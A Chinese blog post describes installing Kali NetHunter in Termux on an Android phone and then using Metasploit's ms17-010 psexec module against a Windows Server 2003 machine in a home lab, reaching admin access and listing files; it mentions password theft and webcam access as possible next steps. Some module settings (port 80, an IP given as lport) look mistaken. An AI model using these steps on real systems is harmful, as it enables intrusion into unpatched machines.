最近闲的无聊,偶然间发现Kali NetHunter(官方文档)

本想刷在手机上测试一下,进官网一看并没有我手机支持的版本,只有一加的型号,不过我在github上找到了一个装在termux上的Kali NetHunter

按照github上的教程很快就能安装完毕

首先更改下termux默认的源

注:Google Play 上的 Termux 已被弃用，如安装会产生兼容性问题。请通过 GitHub 或 F-Droid 来安装 Termux。

termux 运行 termux-change-repo

不出意外的话会弹出一个图形界面,按回车键选择,选中ustc或者bfsu

下载脚本 curl -LO https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter

授予执行权限chmod +x kalinethunter

运行脚本./kalinethunter

如出现ssl错误,改 ./kalinethunter --insecure 运行

网络良好的情况下安装应该不会出什么问题

使用命令startkali启动nethunter。默认用户是kali，默认密码也是kali。

如果您想以 root 用户身份启动 nethunter，请使用 command startkali -r

安装完毕后,输入msfconsole启动渗透测试工具

渗透测试环节选为比较成熟的漏洞 ms17-010

靶机环境:

1. OS: Windows server 2003
2. 防火墙: 关闭
3. IP: 192.168.1.112(445 端口转发 )

攻击机:

1. OS: Mi11(Evolution Android12) Nethunter-In-Termux
2. IP: 192.168.1.105

search ms17-010

我们选择编号为1的模块
use exploit/windows/smb/ms17_010_psexec

set rhost 192.168.1.112

set rport 80

set lport 192.168.1.105

run

查看权限

get uid

可看到已经是Admin权限

ls 查看靶机文件信息

抓取密码开摄像头那些就不演示了,help查看帮助信息,测试了一下电脑端能用的手机上也能用